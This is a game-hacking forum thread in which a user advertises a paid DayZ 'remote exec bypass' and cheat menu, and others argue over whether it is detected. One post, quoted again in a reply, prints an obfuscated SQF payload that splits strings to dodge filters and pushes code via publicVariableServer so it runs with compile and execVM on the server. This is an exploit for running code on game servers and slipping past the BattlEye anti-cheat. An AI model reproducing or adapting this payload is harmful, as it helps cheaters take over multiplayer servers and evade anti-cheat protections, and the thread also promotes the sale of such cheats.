Thanks

Thumbs up AutoBuy Remote Exec Bypass + Scripts ( monky menu ) $9

#edited probably back to sell later.
    Last edited by DayZSeller; 12-06-2012 at 04:46 PM.

Thanks
    My Mood
    Cheerful
    I hope you have permission from monkey.
    [IMG]https://i916.photobucke*****m/albums/ad1/alexharvey52/FORUMSIGsmaller_zpsecc87cf2.jpg[/IMG]

Thanks
    My Mood
    Amused
    Quote Originally Posted by alexharvey52 View Post
    I hope you have permission from monkey.
    I second this

Thanks
    My Mood
    Yeehaw
    Hansgender told me he's selling a detected bypass to all of his customers, and all of his resellers as well.
    The real undetected RE bypass is private.
    I'm pretty sure this one uses
    Code:
    	remExField =
    	[nil,nil,";[(""0;""+""fn""+""c_""+""us""+""ec""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+""={""+""if""+""(i""+""sS""+""er""+""ve""+""r&""+""&(""+""(_""+""th""+""is""+"" s""+""el""+""ec""+""t ""+""2)""+""==""+""0)""+"")t""+""he""+""n{""+""_c""+""od""+""e=""+""ma""+""rk""+""er""+""Te""+""xt""+""'d""+""wa""+""rd""+""en""+""';""+""ca""+""ll""+"" c""+""om""+""pi""+""le""+"" _""+""co""+""de""+"";r""+""em""+""Ex""+""Fi""+""el""+""d=""+""[n""+""il""+"",n""+""il""+"",(""+""';""+""'+""+""_c""+""od""+""e+""+""';""+""')""+""];""+""pu""+""bl""+""ic""+""Va""+""ri""+""ab""+""le""+""'r""+""em""+""Ex""+""Fi""+""el""+""d'""+"";}""+""el""+""se""+""{_""+""th""+""is""+"" c""+""al""+""l ""+""co""+""mp""+""il""+""e ""+""pr""+""ep""+""ro""+""ce""+""ss""+""Fi""+""le""+""Li""+""ne""+""Nu""+""mb""+""er""+""s'""+""\z""+""\a""+""dd""+""on""+""s\""+""da""+""yz""+""_c""+""od""+""e\""+""co""+""mp""+""il""+""e\""+""fn""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+"".s""+""qf""+""';""+""};""+""};""+""0"")]
    	execVM ('\z\ad'+'dons\dayz_co'+'de\medical\publicEH\promptRName.sqf');"];
    	publicVariableServer "remExField";
    This is now part of the BE filters.
    If you are using it, it is highly detected and slowly servers are starting to update their public var and remote exec filters (txt files).
    So if you get kicked for public var 103, and you bought the remote exec.. It's detected.

Thanks
    Quote Originally Posted by L0LKenuz View Post
    Hansgender told me he's selling a detected bypass to all of his customers, and all of his resellers as well.
    The real undetected RE bypass is private.
    I'm pretty sure this one uses
    Code:
    	remExField =
    	[nil,nil,";[(""0;""+""fn""+""c_""+""us""+""ec""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+""={""+""if""+""(i""+""sS""+""er""+""ve""+""r&""+""&(""+""(_""+""th""+""is""+"" s""+""el""+""ec""+""t ""+""2)""+""==""+""0)""+"")t""+""he""+""n{""+""_c""+""od""+""e=""+""ma""+""rk""+""er""+""Te""+""xt""+""'d""+""wa""+""rd""+""en""+""';""+""ca""+""ll""+"" c""+""om""+""pi""+""le""+"" _""+""co""+""de""+"";r""+""em""+""Ex""+""Fi""+""el""+""d=""+""[n""+""il""+"",n""+""il""+"",(""+""';""+""'+""+""_c""+""od""+""e+""+""';""+""')""+""];""+""pu""+""bl""+""ic""+""Va""+""ri""+""ab""+""le""+""'r""+""em""+""Ex""+""Fi""+""el""+""d'""+"";}""+""el""+""se""+""{_""+""th""+""is""+"" c""+""al""+""l ""+""co""+""mp""+""il""+""e ""+""pr""+""ep""+""ro""+""ce""+""ss""+""Fi""+""le""+""Li""+""ne""+""Nu""+""mb""+""er""+""s'""+""\z""+""\a""+""dd""+""on""+""s\""+""da""+""yz""+""_c""+""od""+""e\""+""co""+""mp""+""il""+""e\""+""fn""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+"".s""+""qf""+""';""+""};""+""};""+""0"")]
    	execVM ('\z\ad'+'dons\dayz_co'+'de\medical\publicEH\promptRName.sqf');"];
    	publicVariableServer "remExField";
    This is now part of the BE filters.
    If you are using it, it is highly detected and slowly servers are starting to update their public var and remote exec filters (txt files).
    So if you get kicked for public var 103, and you bought the remote exec.. It's detected.
    this is not the bypass that I have here bro, i'm using a re bypass different and undetected lol

Thanks
    My Mood
    Yeehaw
    Quote Originally Posted by DayZSeller View Post
    this is not the bypass that I have here bro, i'm using a re bypass different and undetected lol
    And you close your thread after I post this.
    Seems legit son.

Thanks
    Quote Originally Posted by L0LKenuz View Post
    And you close your thread after I post this.
    Seems legit son.
    u posted it 29 minutes ago, and i closed my Thread 31 minutes ago. : )